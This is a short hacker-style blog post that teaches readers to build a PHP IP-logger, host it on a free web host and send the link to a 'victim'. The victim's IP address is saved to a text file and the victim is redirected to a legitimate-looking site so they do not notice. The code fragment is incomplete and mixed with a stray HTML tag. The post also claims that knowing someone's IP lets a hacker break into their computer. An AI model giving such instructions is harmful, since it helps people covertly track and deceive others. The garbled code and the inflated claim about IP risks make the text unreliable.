Know someone's IP on the internet

Every device in a network has a unique identification that is called IP (aka Internet Protocol). So every time you connect to Internet your computer is assigned an IP by your Internet Service Provider (ISP). Most people know this story but what they don’t know is that this IP is meant to be kept undisclosed, as if any pro hacker comes to know your IP, he might be able to break into your computer. In this post we’ll create an IP-Logger script and find out how it works.

To create your own IP-logger you have to have this script (kindly download).
Extract this script and you’ll get this code, in the index.php file, as you open it in the notepad.

$ip_address = $_SERVER['REMOTE_ADDR'];
$file2 = "Friends Ip Addresses  ($ip_address) '\n' ";
fwrite($file, $file2);
<title>Hackaholic </title>

Replace with the website url, you want your victim to be redirected to.

Now you just need to create an account in any free webhost. And upload these two file (index.php & text.txt) to the public folder of your account, which you can find at file manger.

Give the link(ex- of your free account to your victim and ask him to visit this website, as soon as he access’s the website his IP address will get stored in the text.txt file, and you’ll get the IP. You can make your victim navigate to some other website when he clicks on the link sent by you by customizing the text in red.

Note: Keep the domain of your free website according to the interest of victim and make this script redirect to some legit website having some relative content, so that your victim doesn't notice anything fishy.